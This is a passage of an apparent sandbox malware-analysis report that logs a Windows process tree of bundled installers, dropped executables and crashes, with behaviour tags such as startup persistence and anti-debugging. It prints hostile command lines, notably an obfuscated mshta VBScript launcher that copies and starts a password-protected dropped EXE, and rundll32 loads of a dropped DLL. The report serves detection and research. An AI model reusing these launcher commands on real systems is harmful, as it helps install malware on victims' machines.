- Suspicious use of SendNotifyMessage
PID:2472 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i18⤵
- Suspicious use of SendNotifyMessage
PID:7616 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i19⤵
- Suspicious use of SendNotifyMessage
PID:7840 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i20⤵
- Suspicious use of SendNotifyMessage
PID:2920 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i21⤵
- Suspicious use of SendNotifyMessage
PID:7660 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i22⤵
- Suspicious use of SendNotifyMessage
PID:6416 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i23⤵
- Suspicious use of SendNotifyMessage
PID:7380 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i24⤵
- Suspicious use of SendNotifyMessage
PID:3344 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i25⤵
- Suspicious use of SendNotifyMessage
PID:2084 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i26⤵
- Suspicious use of SendNotifyMessage
PID:2812 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i27⤵
- Suspicious use of SendNotifyMessage
PID:2912 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i28⤵
- Suspicious use of SendNotifyMessage
PID:7528 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i29⤵
- Suspicious use of SendNotifyMessage
PID:7604 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i30⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SendNotifyMessage
PID:3228 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i31⤵PID:3000
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i32⤵PID:1468
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i33⤵PID:1888
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i34⤵PID:7880
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i35⤵PID:7224
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i36⤵PID:6824
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i37⤵PID:5732
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i38⤵PID:4832
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i39⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6264 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i40⤵PID:4520
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i41⤵
- Executes dropped EXE
- Suspicious use of SendNotifyMessage
PID:4012 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i42⤵PID:7692
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i43⤵PID:3000
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i44⤵PID:5572
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i45⤵
- Drops startup file
PID:6192
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"5⤵PID:4012
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q6⤵
- Executes dropped EXE
PID:5464
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"5⤵
- Executes dropped EXE
PID:2708 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2708 -s 19406⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5280
-
-
-
-
-
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv Wj1zam+WSUeXjPVQTvt7Vw.0.21⤵PID:4632
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 3240 -ip 32401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3140
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
PID:3452
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:2264
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4372 -ip 43721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5084
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 4108 -ip 41081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3368
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 3852 -ip 38521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:664
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4496 -ip 44961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:2696
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " =="" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"1⤵PID:3560
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 3980 -ip 39801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1444
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2372 -ip 23721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2180
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )1⤵PID:4488
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4876 -ip 48761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2236
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 4196 -ip 41961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2500
-
C:\Users\Admin\AppData\Local\Temp\is-VBDH5.tmp\WEATHER Manager.tmp"C:\Users\Admin\AppData\Local\Temp\is-VBDH5.tmp\WEATHER Manager.tmp" /SL5="$10324,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:1688 -
C:\Users\Admin\AppData\Local\Temp\is-8DO3L.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-8DO3L.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=7152⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:5184 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-8DO3L.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-8DO3L.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629316234 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"3⤵PID:1996
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1540 -ip 15401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4076
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 2708 -ip 27081⤵PID:4652
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 5876 -ip 58761⤵PID:6896
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
PID:6820 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding FC203AE969CF91D939E223D06E715631 C2⤵
- Loads dropped DLL
PID:6352
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 84C215FBF4F9A3CB07D959F4BEBA2DBA C2⤵
- Loads dropped DLL
PID:6508
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding A192CF11EF9BB93028EBFDC8C9BE73B82⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:1172
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding DB3644689AA4AE0620F9438B50CBAD46 C2⤵
- Loads dropped DLL
PID:6752
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 95233A027267A4A22A90412B46A7A3FA C2⤵
- Loads dropped DLL
PID:6300
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Adds Run key to start application
- Suspicious use of SendNotifyMessage
PID:6136 -
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6896 -
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"4⤵PID:6644
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exeC:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x218,0x21c,0x220,0x1f4,0x224,0x7ffa0796dec0,0x7ffa0796ded0,0x7ffa0796dee05⤵PID:6104
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1728,16520679506396504534,16325559565975123305,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6644_1917535658" --mojo-platform-channel-handle=2008 /prefetch:85⤵PID:7264
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1728,16520679506396504534,16325559565975123305,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6644_1917535658" --mojo-platform-channel-handle=1792 /prefetch:85⤵PID:4468
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1728,16520679506396504534,16325559565975123305,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6644_1917535658" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1744 /prefetch:25⤵PID:5020
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1728,16520679506396504534,16325559565975123305,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6644_1917535658" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2476 /prefetch:15⤵PID:508
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1728,16520679506396504534,16325559565975123305,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6644_1917535658" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2692 /prefetch:15⤵PID:7252
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1728,16520679506396504534,16325559565975123305,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6644_1917535658" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3324 /prefetch:25⤵PID:7972
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1728,16520679506396504534,16325559565975123305,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6644_1917535658" --mojo-platform-channel-handle=2308 /prefetch:85⤵PID:2424
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1728,16520679506396504534,16325559565975123305,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6644_1917535658" --mojo-platform-channel-handle=2660 /prefetch:85⤵PID:4644
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1728,16520679506396504534,16325559565975123305,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6644_1917535658" --mojo-platform-channel-handle=3652 /prefetch:85⤵PID:8120
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1728,16520679506396504534,16325559565975123305,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6644_1917535658" --mojo-platform-channel-handle=1736 /prefetch:85⤵PID:2452
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,16520679506396504534,16325559565975123305,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6644_1917535658" --mojo-platform-channel-handle=1800 /prefetch:85⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:5500
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_340.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"3⤵PID:2844
-
-
-
C:\Users\Admin\AppData\Local\Temp\EA51.exeC:\Users\Admin\AppData\Local\Temp\EA51.exe1⤵
- Suspicious use of SetWindowsHookEx
PID:6500
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵PID:1848
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1848 -s 4482⤵
- Program crash
PID:1192
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:3508
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 1848 -ip 18481⤵PID:6264
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 6688 -ip 66881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5356
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 5924 -ip 59241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6852
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 6032 -ip 60321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5312
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 492 -ip 4921⤵PID:4992
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5836 -ip 58361⤵PID:6760
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 6272 -ip 62721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1400
-
C:\Users\Admin\AppData\Local\Temp\42B3.exeC:\Users\Admin\AppData\Local\Temp\42B3.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3256
-
C:\Users\Admin\AppData\Local\Temp\55A0.exeC:\Users\Admin\AppData\Local\Temp\55A0.exe1⤵PID:5916
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5916 -s 2922⤵
- Program crash
PID:5500
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:3552 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Loads dropped DLL
PID:4652 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4652 -s 4483⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1044
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 5892 -ip 58921⤵PID:6136
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4652 -ip 46521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6872
-
C:\Users\Admin\AppData\Local\Temp\72DD.exeC:\Users\Admin\AppData\Local\Temp\72DD.exe1⤵
- Executes dropped EXE
- Checks processor information in registry
- Enumerates system info in registry
PID:784 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 784 -s 2802⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6708
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 356 -p 5576 -ip 55761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4004
-
C:\Users\Admin\AppData\Local\Temp\B16E.exeC:\Users\Admin\AppData\Local\Temp\B16E.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1624
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1028 -ip 10281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2840
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 5916 -ip 59161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5840
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 568 -p 7020 -ip 70201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6696
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 784 -ip 7841⤵PID:6220
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 5324 -ip 53241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6736
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 6960 -ip 69601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4116
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:6756 -
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{3ab9c9e1-6ec2-5349-a367-58125693c327}\oemvista.inf" "9" "4d14a44ff" "0000000000000150" "WinSta0\Default" "0000000000000160" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:6220
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oem2.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000180" "ecf9"2⤵
- Drops file in Drivers directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:592
-
-
C:\Users\Admin\AppData\Local\Temp\F473.exeC:\Users\Admin\AppData\Local\Temp\F473.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5756
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
PID:6892
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4368 -ip 43681⤵PID:4080
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:6948
-
C:\Program Files\Windows Defender\mpcmdrun.exe"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable1⤵PID:7164
-
